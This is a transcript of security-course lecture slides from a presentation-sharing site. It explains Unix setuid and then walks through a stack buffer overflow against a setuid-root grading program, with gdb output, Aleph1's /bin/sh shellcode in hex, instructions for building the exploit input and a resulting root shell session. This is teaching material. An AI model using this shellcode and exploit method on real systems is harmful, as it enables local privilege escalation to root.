Protection and Compromise in Computer Security

protection and compromise n.w
1 / 36
Embed
Share

Explore the concept of protection in computer security where multiple principals share resources and the importance of preventing interference. Learn how operating systems and hardware provide protection, along with examples like memory management, file systems, and process scheduling control.

  • Computer Security
  • Protection Mechanisms
  • Operating Systems
  • Resource Sharing
  • Security Principles
rayaanacharya
baysinger_a Follow

Uploaded on | 0 Views

Download Presentation

Please find below an Image/Link to download the presentation.

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author. If you encounter any issues during the download, it is possible that the publisher has removed the file from their server.

You are allowed to download the files provided on this website for personal or commercial use, subject to the condition that they are used lawfully. All files are the property of their respective owners.

Download Presentation

The content on the website is provided AS IS for your information and personal use only. It may not be sold, licensed, or shared on other websites without obtaining consent from the author.

E N D

Presentation Transcript

  1. Protection and Compromise 1

  2. What is Protection? Multiple principals share the same set of resources Principal: a term we use to refer to a person, a process, a device, etc., for security analysis When sharing resources, principals may interfere with each other, e.g., reading/writing to files, communicating with network, using the CPU, etc. The purpose of protection is to ensure principals will not interfere with each other in an undesirable way Who provides protection? Normally the operating system, with some hardware support 2

  3. Some Examples Memory Management System File system access control Network access control Inter-process communication access control Process scheduling control Permission for using certain capabilities on smart phones 3

  4. Lets look at a concrete example I want to write a program that reports the course scores to you. Requirements: Every student can only get his/her score Maintain all students scores in a file Local command-line operation 4

  5. Score file format [root@localhost getscore]# cat score.txt Mary Doe:123-45-6789:A+: Tom Smith:567-89-1234:B: User name Student SSN Score 5

  6. Our little getscore program User name and SSN for authentication Score file only readable to user root A program reads the score file and report the grade to an authenticated user [root@localhost]# ls -l total 24 -rw------- 1 root root 46 Aug 20 11:35 score.txt -rwsr-xr-x 1 root root 12947 Aug 20 11:36 getscore Setuid bit 6

  7. Unix file system basics Permission Owner Group Attributes of a file bits [root@localhost course_scores]# ls -l total 20 -rwsr-xr-x 1 root root 13587 Aug 25 2009 getscore -rw------- 1 root root 88 Aug 25 2009 score.txt d: directory r:read w:write x:execute (access a directory) s:set-uid bit {[d,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x,s,-]} {[r,-] [w,-] [x, -]} directory bit owner permissions group permissions other user permissions 7

  8. Unix set-uid mechanism A user can execute a program if the program file has x bit set for the user Typically the program process will have the invoker s privilege If the program file also has the set-uid bit set for the owner ( s is shown for the owner), then the program will also have the program owner s privilege. We call such programs set-uid programs . 8

  9. Unix set-uid mechanism Provides a path for privilege elevation There are legitimate needs for elevating a process privilege to perform its jobs, e.g. passwd command. (Simplified version) Two user id fields in a process s PCB: real user id (ruid), and effective user id (euid) It is the euid that matters in OS access control. non-setuid programs will have both fields set to the id of the invoker when the program is started. Setuid programs have ruid set to the invoker, but euid set to the owner of the executable when started. There are programming interfaces for changing the two uid s during the program s execution, and rules on which changes are allowed. 9

  10. Getting your score [simon@localhost]$ ./getscore "Mary Doe" 123-45-6789 Your score is A+ [xou@localhost course_scores]$ ./getscore "Tom Smith" 567-89-1234 Your score is B [root@localhost]$ ./getscore "Mary Doe" 123-45-7890 Invalid user name or SSN. 10

  11. Security problems in getscore First things first: analyze the threat Who are the adversaries? What are they after? What are the potential risks and their implications? How would you mitigate the risk? 11

  12. Lets try this [simon@localhost getscore]$ ./getscore "Mary Doe" AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault There is a vulnerability in the getscore program! 12

  13. 32-bit x86 CPU registers EAX ESP accumulator stack pointer EBX EBP base base pointer ECX ESI counter source index EDX EDI data destination index EIP instruction pointer 13

  14. Linux process memory map .text .data heap allocated data > address growth heap < a stack frame stack ESP local variables EBP saved EBP saved EIP function s return address function s arguments main() local variables argc, **argv, **envp environment var s 14 bottom of stack

  15. Calling a function .text .data heap > main(){ : : function(s) : : : } < top of stack ESP main() local vars EBP argc, **argv, **envp environment var s 15

  16. Calling a function .text .data heap > main(){ : : function(s) : : : } push s < top of stack ESP function argument main() local vars EBP argc, **argv, **envp environment var s 16

  17. Calling a function .text .data heap > main(){ : : function(s) : : : } push return EIP function(s){ : < top of stack : ESP saved EIP return; function argument main() local vars } EBP argc, **argv, **envp environment var s 17

  18. Calling a function .text .data heap > main(){ : : function(s) : : : } push EBP allocate a new frame for local variables < top of stack ESP function(s){ local variables : EBP : saved EBP saved EIP return; function argument main() local vars } argc, **argv, **envp environment var s 18

  19. Stack buffer overflow attack .text .data heap > main(){ : : function(s) : : : } < top of stack ESP function(s){ local variables : EBP : saved EBP saved EIP return; function argument main() local vars } argc, **argv, **envp environment var s 19

  20. Returning from a function .text .data heap > main(){ : : function(s) : : : } function(s){ local variables : < : saved EBP saved EIP ESP return; function argument main() local vars } EBP release the function s frame and restore the saved EBP argc, **argv, **envp environment var s 20

  21. Returning from a function .text .data heap > main(){ : : function(s) : : : } function(s){ local variables : : saved EBP saved EIP < return; ESP function argument main() local vars } A buffer overflow on stack can change this control flow EBP release control to the caller argc, **argv, **envp environment var s 21

  22. Stack overflow attack .text .data heap > main(){ : : function(s) : : : } push EBP allocate a new frame for local variables < top of stack AAAAAAAAAAA ESP function(s){ local variables AAAAAAAAAAAAAAA A A A A : EBP : saved EBP saved EIP A A A A return; function argument main() local vars } argc, **argv, **envp environment var s 22

  23. Stack overflow attack .text .data heap > main(){ : : function(s) : : : } < top of stack AAAAAAAAAAA ESP function(s){ local variables AAAAAAAAAAAAAAA A A A A : EBP : saved EBP saved EIP A A A A return; function argument main() local vars } argc, **argv, **envp environment var s 23

  24. Stack overflow attack .text .data heap > main(){ : : function(s) : : : } 0x41414141 EBP function(s){ local variables AAAAAAAAAAA AAAAAAAAAAAAAAA A A A A : < : saved EBP saved EIP A A A A ESP return; function argument main() local vars } release the function s frame and restore the saved EBP argc, **argv, **envp environment var s 24

  25. Stack overflow attack .text .data heap > main(){ : : function(s) : : : } 0x41414141 EBP function(s){ local variables AAAAAAAAAAA AAAAAAAAAAAAAAA A A A A : : saved EBP saved EIP < A A A A return; ESP function argument main() local vars } Control Hijacked by Attacker! argc, **argv, **envp environment var s 25

  26. Playing with getscore Make a copy of the executable into your own directory, put the long input into the $EGG variable, and run it. [simon@localhost simon]$ ./getscore AAA $EGG Segmentation fault (core dumped) Analyze the core file using gdb (gdb) target core core.17312 Core was generated by `./getscore AAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x41414141 in ?? () A A A A We can control the program pointer! 26

  27. Buffer overflow vulnerability Program fails to ensure that a write to a buffer is always within its bound. When buffer overflow happens, data structures in memory will be corrupted, potentially changing the program s behavior. In many cases it can lead to the execution of arbitrary code by attackers A common problem for unsafe programming languages such as C and C++. 27

  28. Setuid and buffer overflow What is the implication of a buffer overflow in a setuid program? If the buffer overflow happens when one of the uid fields contains more privilege, it could result in a local privilege escalation vulnerability, i.e. an attacker who already obtained local access on the system can escalate his privilege. If the setuid program is owned by root, an attacker who has user account privilege may gain root privilege on the system. 28

  29. Writing a buffer overflow exploit Inject a piece of code into the buffer that will give you a shell on the system (called a shellcode ), and let EIP point to it. What will be the privilege of the shell? How to write a shellcode ? Needs to be written in a machine s native language; once executed, gives attacker a shell on the machine. Many existing shellcodes for use. 29

  30. Shell code to use /* Aleph1's Linux shellcode from "Smashing the stack for fun and profit", Phrack 49, vol 7 */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; 30

  31. Creating a malicious input NOP sled Shell Code EIP The original buffer Questions: 1. How long should the input be? 2. Where should we put the EIP in the input? 3. What value of EIP should be put in? 31

  32. Some useful Linux commands man command-name hexdump (or xxd) VariableName=`command` echo $VariableName 32

  33. Some useful gdb commands Load a core file gdb -core core_filename Examine registers info registers Examine memory x/#of words to display Help help [command] 33

  34. Hints Size of the buffer: Must be long enough to contain the shellcode Must be long enough to override saved EIP The order of bytes in memory: x/86 is a little-endian architecture What if the distance is not a multiple of four? Value of EIP: Impacted by the value of ESP 34

  35. Getting a root shell [xou@localhost simon]$ ./exploit_gen_with_esp 0xbffff830 160 120 Length of shell code: 45 Using sp: 0xbffff830 Using address: 0xbffff7b8 NOP sled: 103 bytes [xou@localhost simon]$ cd /root/course_scores/ [xou@localhost course_scores]$ ./getscore aaa $EGG sh-2.05b# sh-2.05b# whoami root sh-2.05b# 35

  36. Thoughts: Need for Protection OS protection prevents applications from interfering with each other An application may be compromised due to vulnerabilities in it. Protection mechanisms are limited by the possible vulnerabilities in privileged applications and system code. 36

Related


No related presentations.

More Related Content